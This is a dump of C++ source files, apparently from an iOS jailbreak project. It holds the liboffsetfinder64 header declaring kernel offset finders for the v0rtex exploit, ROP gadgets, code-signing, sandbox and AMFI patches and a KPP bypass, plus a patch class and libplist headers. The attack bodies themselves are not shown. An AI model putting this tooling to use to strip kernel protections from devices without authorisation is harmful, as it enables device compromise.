98 | };
99 | enum supertype{
100 | sut_general,
101 | sut_branch_imm
102 | };
103 | enum cond{
104 | NE = 000,
105 | EG = 000,
106 | CS = 001,
107 | CC = 001,
108 | MI = 010,
109 | PL = 010,
110 | VS = 011,
111 | VC = 011,
112 | HI = 100,
113 | LS = 100,
114 | GE = 101,
115 | LT = 101,
116 | GT = 110,
117 | LE = 110,
118 | AL = 111
119 | };
120 | type type();
121 | subtype subtype();
122 | supertype supertype();
123 | int64_t imm();
124 | uint8_t rd();
125 | uint8_t rn();
126 | uint8_t rt();
127 | uint8_t other();
128 | public: //cast operators
129 | operator void*();
130 | operator loc_t();
131 | operator enum type();
132 | };
133 |
134 | loc_t find_literal_ref(segment_t segemts, loc_t pos, int ignoreTimes = 0);
135 | loc_t find_rel_branch_source(insn bdst, bool searchUp, int ignoreTimes=0, int limit = 0);
136 |
137 | };
138 | };
139 |
140 |
141 | #endif /* insn_hpp */
142 |
--------------------------------------------------------------------------------
/liboffsetfinder64/liboffsetfinder64.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // offsetfinder64.hpp
3 | // offsetfinder64
4 | //
5 | // Created by tihmstar on 10.01.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef offsetfinder64_hpp
10 | #define offsetfinder64_hpp
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 |
19 | #include
20 | #include
21 | #include
22 | #include
23 | #include
24 |
25 | namespace tihmstar {
26 | class offsetfinder64 {
27 | public:
28 | enum tristate{
29 | kfalse = 0,
30 | ktrue = 1,
31 | kuninitialized = 2
32 | };
33 | private:
34 | bool _freeKernel;
35 | uint8_t *_kdata;
36 | size_t _ksize;
37 | patchfinder64::loc_t _kernel_entry;
38 | std::vector _segments;
39 | tristate _haveSymtab = kuninitialized;
40 |
41 | using loc_t = patchfinder64::loc_t;
42 | struct {
43 | loc_t _gPhysBase;
44 | loc_t _kernel_pmap;
45 | loc_t _cpacr_write;
46 | loc_t _idlesleep_str_loc;
47 | loc_t _deepsleep_str_loc;
48 | patchfinder64::patch _i_can_has_debugger_patch_off;
49 | std::vector _nosuid_off;
50 | patchfinder64::patch _remount_patch_offset;
51 | patchfinder64::patch _lwvm_patch_offsets;
52 | patchfinder64::patch _proc_enforce;
53 | patchfinder64::patch _amfi_patch_offsets;
54 | patchfinder64::patch _cs_enforcement_disable_amfi;
55 | patchfinder64::patch _amfi_substrate_patch;
56 | patchfinder64::patch _nonceEnabler_patch;
57 | patchfinder64::loc_t _sbops;
58 | loc_t _release_arm;
59 | patchfinder64::loc_t _bcopy;
60 | };
61 |
62 | struct symtab_command *__symtab;
63 | void loadSegments();
64 | __attribute__((always_inline)) struct symtab_command *getSymtab();
65 |
66 | public:
67 | offsetfinder64(const char *filename);
68 | offsetfinder64(void* buf, size_t size);
69 | const void *kdata();
70 | patchfinder64::loc_t find_entry();
71 | const std::vector &segments(){return _segments;};
72 | bool haveSymbols();
73 |
74 | patchfinder64::loc_t memmem(const void *little, size_t little_len);
75 |
76 | patchfinder64::loc_t find_sym(const char *sym);
77 | patchfinder64::loc_t find_syscall0();
78 | uint64_t find_register_value(patchfinder64::loc_t where, int reg, patchfinder64::loc_t startAddr = 0);
79 |
80 | /*------------------------ v0rtex -------------------------- */
81 | patchfinder64::loc_t find_zone_map();
82 | patchfinder64::loc_t find_kernel_map();
83 | patchfinder64::loc_t find_kernel_task();
84 | patchfinder64::loc_t find_realhost();
85 | patchfinder64::loc_t find_bzero();
86 | patchfinder64::loc_t _find_bcopy();
87 | patchfinder64::loc_t find_copyout();
88 | patchfinder64::loc_t find_copyin();
89 | patchfinder64::loc_t find_ipc_port_alloc_special();
90 | patchfinder64::loc_t find_ipc_kobject_set();
91 | patchfinder64::loc_t find_ipc_port_make_send();
92 | patchfinder64::loc_t find_chgproccnt();
93 | patchfinder64::loc_t find_kauth_cred_ref();
94 | patchfinder64::loc_t find_osserializer_serialize();
95 | patchfinder64::loc_t _find_release_arm();
96 | uint32_t find_vtab_get_external_trap_for_index();
97 | uint32_t find_vtab_get_retain_count();
98 | uint32_t find_iouserclient_ipc();
99 | uint32_t find_ipc_space_is_task();
100 | uint32_t find_proc_ucred();
101 | uint32_t find_task_bsd_info();
102 | uint32_t find_vm_map_hdr();
103 | uint32_t find_task_itk_self();
104 | uint32_t find_task_itk_registered();
105 | uint32_t find_sizeof_task();
106 |
107 | patchfinder64::loc_t find_rop_add_x0_x0_0x10();
108 | patchfinder64::loc_t find_rop_add_x0_x0_0x40();
109 | patchfinder64::loc_t find_rop_ldr_x0_x0_0x10();
110 | patchfinder64::loc_t find_IOMalloc();
111 | patchfinder64::loc_t find_IOFree();
112 |
113 | /*------------------------ kernelpatches -------------------------- */
114 | patchfinder64::patch _find_i_can_has_debugger_patch_off();
115 | patchfinder64::patch _find_lwvm_patch_offsets();
116 | patchfinder64::patch _find_remount_patch_offset();
117 | std::vector _find_nosuid_off();
118 | patchfinder64::patch _find_proc_enforce();
119 | patchfinder64::patch _find_amfi_patch_offsets();
120 | patchfinder64::patch _find_cs_enforcement_disable_amfi();
121 | patchfinder64::patch _find_amfi_substrate_patch();
122 | patchfinder64::patch find_sandbox_patch();
123 | patchfinder64::loc_t _find_sbops();
124 | patchfinder64::patch _find_nonceEnabler_patch();
125 | patchfinder64::patch find_nonceEnabler_patch_nosym();
126 |
127 | inline std::vector all_patches() {
128 | return {
129 | find_i_can_has_debugger_patch_off(),
130 | find_remount_patch_offset(),
131 | find_lwvm_patch_offsets(),
132 | _nosuid_off.at(0),
133 | _nosuid_off.at(1),
134 | find_proc_enforce(),
135 | find_amfi_patch_offsets(),
136 | find_cs_enforcement_disable_amfi(),
137 | find_amfi_substrate_patch(),
138 | find_nonceEnabler_patch()
139 | };
140 | }
141 |
142 |
143 | /*------------------------ KPP bypass -------------------------- */
144 | patchfinder64::loc_t _find_gPhysBase();
145 | patchfinder64::loc_t _find_kernel_pmap();
146 | patchfinder64::loc_t find_kernel_pmap_nosym();
147 | patchfinder64::loc_t _find_cpacr_write();
148 | patchfinder64::loc_t _find_idlesleep_str_loc();
149 | patchfinder64::loc_t _find_deepsleep_str_loc();
150 |
151 | inline patchfinder64::loc_t linker_base() {
152 | return (loc_t)0xfffffff007004000;
153 | }
154 |
155 | inline patchfinder64::loc_t find_bcopy() {
156 | return _bcopy;
157 | }
158 | inline patchfinder64::loc_t find_gPhysBase() {
159 | return _gPhysBase;
160 | }
161 | inline patchfinder64::loc_t find_kernel_pmap() {
162 | return _kernel_pmap;
163 | }
164 | inline patchfinder64::loc_t find_cpacr_write() {
165 | return _cpacr_write;
166 | }
167 | inline patchfinder64::loc_t find_idlesleep_str_loc() {
168 | return _idlesleep_str_loc;
169 | }
170 | inline patchfinder64::loc_t find_deepsleep_str_loc() {
171 | return _deepsleep_str_loc;
172 | }
173 | inline const patchfinder64::patch &find_i_can_has_debugger_patch_off() const {
174 | return _i_can_has_debugger_patch_off;
175 | }
176 | inline patchfinder64::patch find_lwvm_patch_offsets() {
177 | return _lwvm_patch_offsets;
178 | }
179 | constexpr inline const patchfinder64::patch &find_remount_patch_offset() const {
180 | return _remount_patch_offset;
181 | }
182 | constexpr inline const std::vector &find_nosuid_off() const {
183 | return _nosuid_off;
184 | }
185 | inline patchfinder64::patch find_proc_enforce() {
186 | return _proc_enforce;
187 | }
188 | inline patchfinder64::patch find_amfi_patch_offsets() {
189 | return _amfi_patch_offsets;
190 | }
191 | inline patchfinder64::patch find_cs_enforcement_disable_amfi() {
192 | return _cs_enforcement_disable_amfi;
193 | }
194 | inline patchfinder64::patch find_amfi_substrate_patch() {
195 | return _amfi_substrate_patch;
196 | }
197 | constexpr inline patchfinder64::loc_t find_sbops() const {
198 | return _sbops;
199 | }
200 | inline patchfinder64::patch find_nonceEnabler_patch() {
201 | return _nonceEnabler_patch;
202 | }
203 | inline patchfinder64::loc_t find_release_arm() {
204 | return _release_arm;
205 | }
206 |
207 | /*------------------------ Util -------------------------- */
208 | patchfinder64::loc_t find_rootvnode();
209 |
210 | ~offsetfinder64();
211 | };
212 | }
213 |
214 |
215 |
216 | #endif /* offsetfinder64_hpp */
217 |
--------------------------------------------------------------------------------
/liboffsetfinder64/patch.cpp:
--------------------------------------------------------------------------------
1 | //
2 | // patch.cpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #include "liboffsetfinder64/patch.hpp"
10 |
11 | using namespace tihmstar::patchfinder64;
12 |
13 | patch::patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uintptr_t slide)) : _location(location), _patchSize(patchSize), _slidefunc(slidefunc){
14 | _patch = malloc(_patchSize);
15 | memcpy((void*)_patch, patch, _patchSize);
16 | _slideme = (_slidefunc) ? true : false;
17 | }
18 |
19 | patch::patch(const patch& cpy) : _location(cpy._location), _patchSize(cpy._patchSize), _slideme(cpy._slideme), _slidefunc(cpy._slidefunc) {
20 | _patch = malloc(_patchSize);
21 | memcpy((void*)_patch, cpy._patch, _patchSize);
22 | }
23 |
24 | patch::patch(patch &&cpy) : _location(cpy._location), _patchSize(cpy._patchSize), _patch(cpy._patch), _slideme(cpy._slideme), _slidefunc(cpy._slidefunc) {
25 | cpy._patch = nullptr;
26 | }
27 |
28 | void patch::slide(uintptr_t slide) {
29 | if (!_slideme)
30 | return;
31 | printf("sliding with %p\n",(void*)slide);
32 | _slidefunc(this,slide);
33 | _slideme = false; //only slide once
34 | }
35 |
36 | patch::patch() : _location(0), _patch(nullptr), _patchSize(0) {}
37 |
38 | patch &patch::operator=(const patch &p) {
39 | free((void*)_patch);
40 | this->_patch = malloc(p._patchSize);
41 | memcpy((void*)this->_patch, (void*)p._patch, p._patchSize);
42 | this->_location = p._location;
43 | this->_patchSize = p._patchSize;
44 | this->_slideme = p._slideme;
45 | this->_slidefunc = p._slidefunc;
46 | return *this;
47 | }
48 |
49 | patch &patch::operator=(patch &&p) {
50 | free((void*)_patch);
51 | this->_patch = p._patch;
52 | p._patch = nullptr;
53 | this->_location = p._location;
54 | this->_patchSize = p._patchSize;
55 | this->_slideme = p._slideme;
56 | this->_slidefunc = p._slidefunc;
57 | return *this;
58 | }
59 |
60 | patch::~patch(){
61 | free((void*)_patch);
62 | }
63 |
--------------------------------------------------------------------------------
/liboffsetfinder64/patch.hpp:
--------------------------------------------------------------------------------
1 | //
2 | // patch.hpp
3 | // liboffsetfinder64
4 | //
5 | // Created by tihmstar on 09.03.18.
6 | // Copyright © 2018 tihmstar. All rights reserved.
7 | //
8 |
9 | #ifndef patch_hpp
10 | #define patch_hpp
11 |
12 | #include
13 | #include
14 | #include
15 | #include
16 |
17 | namespace tihmstar {
18 | namespace patchfinder64{
19 |
20 | class patch{
21 | bool _slideme;
22 | void(*_slidefunc)(class patch *patch, uintptr_t slide);
23 | public:
24 | loc_t _location;
25 | void *_patch;
26 | size_t _patchSize;
27 | patch(loc_t location, const void *patch, size_t patchSize, void(*slidefunc)(class patch *patch, uintptr_t slide) = NULL);
28 | patch(const patch& cpy);
29 | patch(patch &&cpy);
30 | void slide(uintptr_t slide);
31 | patch &operator=(const patch &p);
32 | patch &operator=(patch &&p);
33 | patch();
34 | ~patch();
35 | };
36 |
37 | }
38 | }
39 |
40 | #endif /* patch_hpp */
41 |
--------------------------------------------------------------------------------
/plist/Array.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Array.h
3 | * Array node type for C++ binding
4 | *
5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved.
6 | *
7 | * This library is free software; you can redistribute it and/or
8 | * modify it under the terms of the GNU Lesser General Public
9 | * License as published by the Free Software Foundation; either
10 | * version 2.1 of the License, or (at your option) any later version.
11 | *
12 | * This library is distributed in the hope that it will be useful,
13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | * Lesser General Public License for more details.
16 | *
17 | * You should have received a copy of the GNU Lesser General Public
18 | * License along with this library; if not, write to the Free Software
19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20 | */
21 |
22 | #ifndef PLIST_ARRAY_H
23 | #define PLIST_ARRAY_H
24 |
25 | #include
26 | #include
27 |
28 | namespace PList
29 | {
30 |
31 | class Array : public Structure
32 | {
33 | public :
34 | Array(Node* parent = NULL);
35 | Array(plist_t node, Node* parent = NULL);
36 | Array(const Array& a);
37 | Array& operator=(Array& a);
38 | virtual ~Array();
39 |
40 | Node* Clone() const;
41 |
42 | Node* operator[](unsigned int index);
43 | void Append(Node* node);
44 | void Insert(Node* node, unsigned int pos);
45 | void Remove(Node* node);
46 | void Remove(unsigned int pos);
47 | unsigned int GetNodeIndex(Node* node) const;
48 |
49 | private :
50 | std::vector _array;
51 | };
52 |
53 | };
54 |
55 | #endif // PLIST_ARRAY_H
56 |
--------------------------------------------------------------------------------
/plist/Boolean.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Boolean.h
3 | * Boolean node type for C++ binding
4 | *
5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved.
6 | *
7 | * This library is free software; you can redistribute it and/or
8 | * modify it under the terms of the GNU Lesser General Public
9 | * License as published by the Free Software Foundation; either
10 | * version 2.1 of the License, or (at your option) any later version.
11 | *
12 | * This library is distributed in the hope that it will be useful,
13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | * Lesser General Public License for more details.
16 | *
17 | * You should have received a copy of the GNU Lesser General Public
18 | * License along with this library; if not, write to the Free Software
19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20 | */
21 |
22 | #ifndef PLIST_BOOLEAN_H
23 | #define PLIST_BOOLEAN_H
24 |
25 | #include
26 |
27 | namespace PList
28 | {
29 |
30 | class Boolean : public Node
31 | {
32 | public :
33 | Boolean(Node* parent = NULL);
34 | Boolean(plist_t node, Node* parent = NULL);
35 | Boolean(const Boolean& b);
36 | Boolean& operator=(Boolean& b);
37 | Boolean(bool b);
38 | virtual ~Boolean();
39 |
40 | Node* Clone() const;
41 |
42 | void SetValue(bool b);
43 | bool GetValue() const;
44 | };
45 |
46 | };
47 |
48 | #endif // PLIST_BOOLEAN_H
49 |
--------------------------------------------------------------------------------
/plist/Data.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Data.h
3 | * Data node type for C++ binding
4 | *
5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved.
6 | *
7 | * This library is free software; you can redistribute it and/or
8 | * modify it under the terms of the GNU Lesser General Public
9 | * License as published by the Free Software Foundation; either
10 | * version 2.1 of the License, or (at your option) any later version.
11 | *
12 | * This library is distributed in the hope that it will be useful,
13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | * Lesser General Public License for more details.
16 | *
17 | * You should have received a copy of the GNU Lesser General Public
18 | * License along with this library; if not, write to the Free Software
19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20 | */
21 |
22 | #ifndef PLIST_DATA_H
23 | #define PLIST_DATA_H
24 |
25 | #include
26 | #include
27 |
28 | namespace PList
29 | {
30 |
31 | class Data : public Node
32 | {
33 | public :
34 | Data(Node* parent = NULL);
35 | Data(plist_t node, Node* parent = NULL);
36 | Data(const Data& d);
37 | Data& operator=(Data& d);
38 | Data(const std::vector& buff);
39 | virtual ~Data();
40 |
41 | Node* Clone() const;
42 |
43 | void SetValue(const std::vector& buff);
44 | std::vector GetValue() const;
45 | };
46 |
47 | };
48 |
49 | #endif // PLIST_DATA_H
50 |
--------------------------------------------------------------------------------
/plist/Date.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Date.h
3 | * Date node type for C++ binding
4 | *
5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved.
6 | *
7 | * This library is free software; you can redistribute it and/or
8 | * modify it under the terms of the GNU Lesser General Public
9 | * License as published by the Free Software Foundation; either
10 | * version 2.1 of the License, or (at your option) any later version.
11 | *
12 | * This library is distributed in the hope that it will be useful,
13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | * Lesser General Public License for more details.
16 | *
17 | * You should have received a copy of the GNU Lesser General Public
18 | * License along with this library; if not, write to the Free Software
19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20 | */
21 |
22 | #ifndef PLIST_DATE_H
23 | #define PLIST_DATE_H
24 |
25 | #include
26 | #include
27 | #include
28 |
29 | namespace PList
30 | {
31 |
32 | class Date : public Node
33 | {
34 | public :
35 | Date(Node* parent = NULL);
36 | Date(plist_t node, Node* parent = NULL);
37 | Date(const Date& d);
38 | Date& operator=(Date& d);
39 | Date(timeval t);
40 | virtual ~Date();
41 |
42 | Node* Clone() const;
43 |
44 | void SetValue(timeval t);
45 | timeval GetValue() const;
46 | };
47 |
48 | };
49 |
50 | #endif // PLIST_DATE_H
51 |
--------------------------------------------------------------------------------
/plist/Dictionary.hpp:
--------------------------------------------------------------------------------
1 | /*
2 | * Dictionary.h
3 | * Dictionary node type for C++ binding
4 | *
5 | * Copyright (c) 2009 Jonathan Beck All Rights Reserved.
6 | *
7 | * This library is free software; you can redistribute it and/or
8 | * modify it under the terms of the GNU Lesser General Public
9 | * License as published by the Free Software Foundation; either
10 | * version 2.1 of the License, or (at your option) any later version.
11 | *
12 | * This library is distributed in the hope that it will be useful,
13 | * but WITHOUT ANY WARRANTY; without even the implied warranty of
14 | * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
15 | * Lesser General Public License for more details.
16 | *
17 | * You should have received a copy of the GNU Lesser General Public
18 | * License along with this library; if not, write to the Free Software
19 | * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
20 | */
21 |
22 | #ifndef PLIST_DICTIONARY_H
23 | #define PLIST_DICTIONARY_H
24 |
25 | #include
26 | #include